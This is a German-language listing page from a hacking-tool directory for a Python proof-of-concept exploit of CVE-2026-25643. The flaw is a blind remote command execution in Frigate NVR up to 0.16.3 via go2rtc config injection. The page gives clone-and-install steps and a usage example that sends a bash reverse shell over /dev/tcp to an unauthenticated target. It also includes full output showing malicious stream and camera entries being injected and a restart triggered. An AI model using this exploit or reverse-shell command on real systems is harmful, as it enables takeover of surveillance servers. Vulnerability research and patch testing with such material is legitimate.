Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-25643 — CVE-2026-25643: Frigate ≤0.16.3 Blind-RCE über go2rtc exec injection | Kitploit
Tools/GitHubGitHub/joshuavanderpoll/cve-2026-25643
ExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubjoshuavanderpoll/cve-2026-25643

CVE-2026-25643

CVE-2026-25643: Frigate ≤0.16.3 Blind-RCE über go2rtc exec injection

Repository anzeigen
7vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Webseite

Frigate NVR ≤ 0.16.3 Blind-RCE-Exploit (CVE-2026-25643) PoC

Python

📜 Beschreibung

Dieser Python-Exploit zielt auf eine kritische Schwachstelle in der Konfigurationsmanipulation von Frigate NVR bis Version 0.16.3 ab (sowohl authentifizierte als auch nicht authentifizierte Pfade). Durch das Einschleusen eines bösartigen go2rtc-Streams und eines gefälschten Kameraeintrags wird beim Neustart des Dienstes die Ausführung beliebiger Befehle als Frigate-Prozess ausgelöst — weder eine Reverse Shell noch die Erfassung der Ausgabe ist erforderlich.

🛠️ Installation

[!NOTE] Um eine saubere und isolierte Umgebung für die Projektabhängigkeiten zu gewährleisten, wird empfohlen, das Python-Modul venv zu verwenden.

OSX/Linux

root@kitploit:~
git clone https://github.com/joshuavanderpoll/CVE-2026-25643.git
cd CVE-2026-25643
python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt

Windows

root@kitploit:~
git clone https://github.com/joshuavanderpoll/CVE-2026-25643.git
cd CVE-2026-25643
python -m venv .venv 
.venv\Scripts\activate
pip3 install -r requirements.txt

⚙️ Verwendung

root@kitploit:~
python3 CVE-2026-25643.py -c "bash -i >& /dev/tcp/host.docker.internal/1111 0>&1" --url http://localhost:5001/

 Target : http://localhost:5001
 Command: bash -i >& /dev/tcp/host.docker.internal/1111 0>&1

[!] No credentials provided → attempting unauthenticated access
[*] Fetching current configuration (/api/config/raw) ...
[*] Config fetch → HTTP 200
[*] Received 914 bytes
[*] Config was JSON-wrapped → unwrapped
[+] Config parsed successfully (7 top-level keys)
[*] Preparing payload → executing: bash -i >& /dev/tcp/host.docker.internal/1111 0>&1
[*] Using payload: bash -c 'bash -i >& /dev/tcp/host.docker.internal/1111 0>&1'
[+] Injected malicious stream → debug_cmd
[+] Injected trigger camera → trigger_exec
[*] Sending modified config (861 bytes) with option: restart
[*] Config save → HTTP 200
[+] Configuration accepted (server should restart)

============================================================
 Payload sent! Command should execute during go2rtc init / camera probe.
 Keep in mind:
 • Output is NOT captured (blind execution)
 • Command runs as the user/frigate process
 • Multiple executions may occur during restart
============================================================

🐋 Docker-PoC

root@kitploit:~
cd docker/
docker compose down
docker compose up -d
# You can test at --url http://127.0.0.1:5001

💻 Beispiel

PoC ausführen Verbindung empfangen

🕵🏼 Referenzen

  • Inspiration von https://github.com/jduardo2704/CVE-2026-25643-Frigate-RCE

📢 Haftungsausschluss

Dieses Tool dient ausschließlich Bildungs- und Forschungszwecken. Der Ersteller übernimmt keine Verantwortung für Missbrauch oder Schäden, die durch das Tool verursacht werden.

Tool herunterladen